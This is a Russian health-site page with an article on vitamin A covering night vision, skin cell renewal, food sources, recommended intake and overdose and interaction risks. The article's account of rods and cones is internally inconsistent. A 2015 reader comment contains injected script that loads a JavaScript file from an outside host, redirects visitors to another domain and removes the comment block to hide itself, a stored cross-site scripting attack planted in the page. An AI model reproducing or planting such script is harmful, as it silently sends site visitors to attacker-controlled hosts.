Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Необычные свойства витами...  >>  Необычные свойства витамина А
 
Обратная связь
 

Необычные свойства витамина А

Размер шрифта
22 декабря 2011 07:13
  • google_analytics: false
  • Нравится

Нам с детства внушали, что нужно съесть морковку, которая содержит витамин А, чтобы лучше видеть. Но заканчиваются ли на этом все свойства этого вещества?

Витамин А действительно влияет на способность видеть в темноте

Оказавшись в темноте, человек через 20-30 секунд начинает различать желтый и синий цвет. Если синий цвет не различается, а вместо желтого видно лишь светлое пятно, это может быть признаком «куриной слепоты».

Почему так происходит? 

Сетчатка глаза состоит из двух видов клеток – палочек и колбочек. Палочки отвечают за сумеречное зрение и ориентирование в темноте, а колбочки отвечают за восприятие цвета и остроту зрения.

Колбочки содержат вещества, которые распадаются под действием света, в результате возбуждение нервных волокон передается по зрительному нерву в мозг. Светочувствительное вещество в палочках называют родопсином (зрительный пурпур), который образуется из витамина А. Если витамина А не хватает, то родопсин в колбочках глаза не восстанавливается, человек плохо видит в темноте и не различает цвета.

Витамин А и кожа

В первую очередь витамин А ускоряет клеточное обновление (говоря медицинским языком, является кераторегулятором).

Наша кожа состоит из нескольких «этажей». Новые клетки кожи образуются в глубинных слоях и по мере созревания продвигаются к верхнему слою кожи. В норме такой процесс занимает около 28 дней. Под воздействием ретинола процесс созревания клеток кожи значительно ускоряется, и клетки не успевают состариться. Они созревают быстрее, быстрее отшелушиваются, и молодые клетки занимают свое место на поверхности кожи.

Источники витамина А

  • Источники животного происхождения – ретиноиды.
  • Источники растительного происхождения – каротиноиды, в составе которого есть бета-каротин, который преобразуется в организме в витамин А.
  • Больше всего витамина А в печени (говядина, свинина, курица, индейка, рыба) – 6500 мкг. В моркови 835 мкг.

Мужчинам старше 19 лет нужно потреблять 900 мкг, а женщинам старше 19 – 700 мкг витамина А. Беременным женщинам требуется чуть больше витамина А. Витамин А, получаемый из продуктов питания, безопасен.

Когда витамин А опасен

  • Передозировка витаминных комплексов с витамином А может привести к печеночной недостаточности и даже смерти.
  • Если беременная принимает слишком много витамина, это может вызвать врожденные уродства у плода.
  • Отдельно следует сказать об опасности для курильщиков. Курильщики, принимающие витамин А, на 18% больше остальных рискуют заболеть раком легких. Пока ученые не могут объяснить, почему витамин А так опасен для курильщиков.
Опасные сочетания
  • Люди, которые принимают антибиотики (тетрациклин) и большие дозы витамина А, могут испытывать сильные головные боли из-за внутричерепной гипертензии, при которой повышается давление жидкости мозга.
  • Длительный прием витамина А и высоких доз антикоагулянтов может увеличить риск кровотечений.

Видеосюжеты по теме:

Великолепный витамин А. Кирпичик в здании здоровья

 




  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:02

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мифы про мясо. Не питайтесь иллюзиями!   Неалкогольное ожирение печени – молчаливая угроза для жизни. Узнайте о заболевании больше   Неалкогольная жировая болезнь печени   Ваша работа убивает вашу печень  

Слайдшоу

1
Что кроме алкоголя убивает печень Еда, предотвращающая головную боль
Неожиданные враги печени Самая низкокалорийная еда
Как выбрать обезболивающее? Болезни, которые превратят вашу кожу в кошмар!
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.